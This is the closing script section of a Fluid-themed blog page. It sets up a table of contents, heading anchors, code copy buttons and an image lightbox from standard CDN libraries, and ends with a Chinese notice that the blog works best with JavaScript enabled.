    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
